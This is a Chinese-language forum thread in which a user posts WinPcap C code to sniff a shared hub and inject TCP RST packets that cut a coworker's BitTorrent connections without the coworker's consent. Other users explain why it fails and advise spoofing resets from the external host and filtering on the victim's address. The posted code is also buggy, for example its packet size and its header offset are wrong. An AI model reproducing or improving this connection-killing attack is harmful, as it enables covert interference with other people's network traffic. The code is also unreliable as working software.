tcp的RST标志问题

syshunter

小弟最近给同一内网的兄弟用BT下载搞的很是苦恼。因为是HUB，于是想一个点子。用winpcap截包，如果包的源IP是他的，则给目的IP发送RST标志的包。由于对TCP协议不是很了解，包包截取到后，修改了RST标志后直接再发送，但就没有任何效果，用自己机器测试，上网仍然很正常。
考虑到WINPCAP和LIBPCAP都差不多，就发在这里了，望见晾。代码如下：

1. 
   
2. // deny.cpp : Defines the entry point for the console application.
   
3. //
   
4. 
   
5. #include "stdafx.h"
   
6. #include "pcap.h"
   
7. 
   
8. #define TMP_IP  "218.23.116.57"
   
9. #define TH_RST 0x04
   
10. 
    
11. #define DEBUG
    
12. 
    
13. //struct sniff_ethernet {
    
14. //    UCHAR ether_dhost[6]; /* Destination host address */
    
15. //    UCHAR ether_shost[6]; /* Source host address */
    
16. //    USHORT ether_type; /* IP? ARP? RARP? etc */
    
17. //};
    
18. 
    
19. 
    
20. //typedef struct ip_address{
    
21. //    u_char byte1;
    
22. //    u_char byte2;
    
23. //    u_char byte3;
    
24. //    u_char byte4;
    
25. //}ip_address;
    
26. 
    
27. /* IPv4 header */
    
28. typedef struct ip_header{
    
29.     u_char  ver_ihl;        // Version (4 bits) + Internet header length (4 bits)
    
30.     u_char  tos;            // Type of service
    
31.     u_short tlen;           // Total length
    
32.     u_short identification; // Identification
    
33.     u_short flags_fo;       // Flags (3 bits) + Fragment offset (13 bits)
    
34.     u_char  ttl;            // Time to live
    
35.     u_char  proto;          // Protocol
    
36.     u_short crc;            // Header checksum
    
37. //    ip_address  saddr;      // Source address
    
38. //    ip_address  daddr;      // Destination address
    
39.         UINT        saddr;
    
40.         UINT        daddr;
    
41.     u_int   op_pad;         // Option + Padding
    
42. }ip_header;
    
43. 
    
44. /*  tcp header  */
    
45. typedef struct tcphdr
    
46. {
    
47.     USHORT sport;
    
48.     USHORT dport;
    
49.     unsigned int seq;
    
50.     unsigned int ack;
    
51.     unsigned char lenres;
    
52.     unsigned char flag;
    
53.     USHORT win;
    
54.     USHORT sum;
    
55.     USHORT urp;
    
56. }tcp_header;
    
57. 
    
58. /* UDP header*/
    
59. typedef struct udp_header{
    
60.     u_short sport;          // Source port
    
61.     u_short dport;          // Destination port
    
62.     u_short len;            // Datagram length
    
63.     u_short crc;            // Checksum
    
64. }udp_header;
    
65. 
    
66. 
    
67. 
    
68. pcap_t *p;
    
69. 
    
70. void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data)
    
71. {
    
72.         u_char *send_data = (u_char *)pkt_data;
    
73. //        struct sniff_ethernet *ethernet;
    
74.         ip_header *ih;
    
75.         tcp_header *th;
    
76.         int ih_len;
    
77.         u_int addr=0;
    
78. 
    
79.         addr=inet_addr(TMP_IP);
    
80. //        ethernet = (struct sniff_ethernet *)(pkt_data);
    
81.         ih = (ip_header *)(send_data+22);
    
82.         ih_len=(ih->;ver_ihl & 0xf) *4;
    
83.         th = (tcp_header *)((u_char *)ih+ih_len);
    
84.        
    
85.         if(ih->;saddr==addr) {
    
86. #ifdef DEBUG
    
87.                 printf("%d : %d ->; %d : %d\n",
    
88.                 ih->;saddr,
    
89.         ntohs(th->;sport),
    
90.         ih->;daddr,
    
91.         ntohs(th->;dport));
    
92. #endif
    
93. 
    
94.                 th->;ack=0;
    
95.                 th->;flag=TH_RST;                                                //Set the tcp's flag to 'rst'
    
96.                 if(pcap_sendpacket(p,send_data,sizeof(send_data))!=0) {     //send data
    
97. 
    
98.                         fprintf(stderr,"\nError sending the packet. \n");
    
99.                         return;
    
100.                 }
     
101.      }
     
102. 
     
103. 
     
104. }
     
105. 
     
106. int main(int argc, char *argv[])
     
107. {
     
108.         pcap_if_t *alldevs;
     
109.         pcap_if_t *d;
     
110.         int inum;
     
111.         int i=0;
     
112.         pcap_t *adhandle;
     
113.         char errbuf[PCAP_ERRBUF_SIZE];
     
114. //        u_int netmask;
     
115.         char packet_filter[] = "ip and udp";
     
116. //        struct bpf_program fcode;
     
117.        
     
118.     /* Retrieve the device list */
     
119.    if (pcap_findalldevs(&alldevs, errbuf) == -1)
     
120.         {
     
121.                 fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
     
122.                 return 0;
     
123.                 //exit(1);
     
124.         }
     
125. 
     
126.    
     
127.     /* Print the list */
     
128.     for(d=alldevs; d; d=d->;next)
     
129.     {
     
130.         printf("%d. %s", ++i, d->;name);
     
131.         if (d->;description)
     
132.             printf(" (%s)\n", d->;description);
     
133.         else
     
134.             printf(" (No description available)\n");
     
135.     }
     
136.        
     
137.     if(i==0)
     
138.     {
     
139.         printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
     
140.         return -1;
     
141.     }
     
142.    
     
143.     printf("Enter the interface number (1-%d):",i);
     
144.     scanf("%d", &inum);
     
145.    
     
146.     if(inum < 1 || inum >; i)
     
147.     {
     
148.         printf("\nInterface number out of range.\n");
     
149.         /* Free the device list */
     
150.         pcap_freealldevs(alldevs);
     
151.         return -1;
     
152.     }
     
153.        
     
154.     /* Jump to the selected adapter */
     
155.     for(d=alldevs, i=0; i< inum-1 ;d=d->;next, i++);
     
156.    
     
157.     /* Open the adapter */
     
158.     if ( (adhandle= pcap_open_live(d->;name,  // name of the device
     
159.                 65536,     // portion of the packet to capture.
     
160.                 // 65536 grants that the whole packet will be captured on all the MACs.
     
161.                 1,         // promiscuous mode
     
162.                 1000,      // read timeout
     
163.                       // remote authentication
     
164.                 errbuf     // error buffer
     
165.                 ) ) == NULL)
     
166.     {
     
167.         fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n");
     
168.         /* Free the device list */
     
169.         pcap_freealldevs(alldevs);
     
170.         return -1;
     
171.     }
     
172.    
     
173.     /* Check the link layer. We support only Ethernet for simplicity. */
     
174. //    if(pcap_datalink(adhandle) != DLT_EN10MB)
     
175. //   {
     
176. //        fprintf(stderr,"\nThis program works only on Ethernet networks.\n");
     
177. //        /* Free the device list */
     
178. //        pcap_freealldevs(alldevs);
     
179. //        return -1;
     
180. //    }
     
181. //   
     
182. //    if(d->;addresses != NULL)
     
183. //        /* Retrieve the mask of the first address of the interface */
     
184. //        netmask=((struct sockaddr_in *)(d->;addresses->;netmask))->;sin_addr.S_un.S_addr;
     
185. //    else
     
186. //        /* If the interface is without addresses we suppose to be in a C class network */
     
187. //       netmask=0xffffff;
     
188. //       
     
189. //       
     
190. //    //compile the filter
     
191. //    if (pcap_compile(adhandle, &fcode, packet_filter, 1, netmask) <0 )
     
192. //    {
     
193. //        fprintf(stderr,"\nUnable to compile the packet filter. Check the syntax.\n");
     
194. //        /* Free the device list */
     
195. //        pcap_freealldevs(alldevs);
     
196. //        return -1;
     
197. //    }
     
198. //   
     
199. //    //set the filter
     
200. //    if (pcap_setfilter(adhandle, &fcode)<0)
     
201. //    {
     
202. //        fprintf(stderr,"\nError setting the filter.\n");
     
203. //        /* Free the device list */
     
204. //        pcap_freealldevs(alldevs);
     
205. //        return -1;
     
206. //    }
     
207.    
     
208.     printf("\nlistening on %s...\n", d->;description);
     
209.    
     
210.     /* At this point, we don't need any more the device list. Free it */
     
211.     pcap_freealldevs(alldevs);
     
212.    
     
213.     /* start the capture */
     
214.         p=adhandle;                        
     
215.     pcap_loop(adhandle, 0, packet_handler, NULL);
     
216.    
     
217.     return 0;
     
218. }
     
219. 
     

复制代码

TMP_IP就是我要设置成用BT的兄弟的IP。

win_hate

>;>;>;>;果包的源IP是他的，则给目的IP发送RST标志的包

这个方法不大对头，因为你并不能截止原来的包，一般原来那个包会比你后来发的先到，你发的包与原来的包具有相同的序列号，并认为是重复的。

你可以冒充外网的机器向``用BT的兄弟的IP'' 发 RST.   ack 设为0 是不行的。


ps:  win_pacp/libpcap 现在可以发包了吗？

rootclown

you may as well see this
http://bbs.chinaunix.net/forum/v ... highlight=rootclown

syshunter

谢谢，我明白了。

winpcap有pcap_sendpacket()，libpcap没有。

还有我的那个pcap_sendapcket中计算包大小用sizeof(send_data)根本不对，基础问题，汗！

syshunter

还有一点小问题，我的网络结构是：
internet---adslmodem----HUB
                                        /   \
                                       /     \
                                     /         \
                                    me       B
me是我的机器，B是他的，我们各自拨号上网，问题是只能捕获到内网IP，却捕获不到他的外网IP。靠rootclown提供的代码，现在只能拒绝他的内网访问。外网连接依然正常。

而sniffer却能做到。不知道为什么。

rootclown

do you have linux installed?
use pcap instead of PF_PACKET and set a filter like
    "tcp and src host 192.168.1.2"
where 192.168.1.2 is the one you want to kill
winpcap should have the same function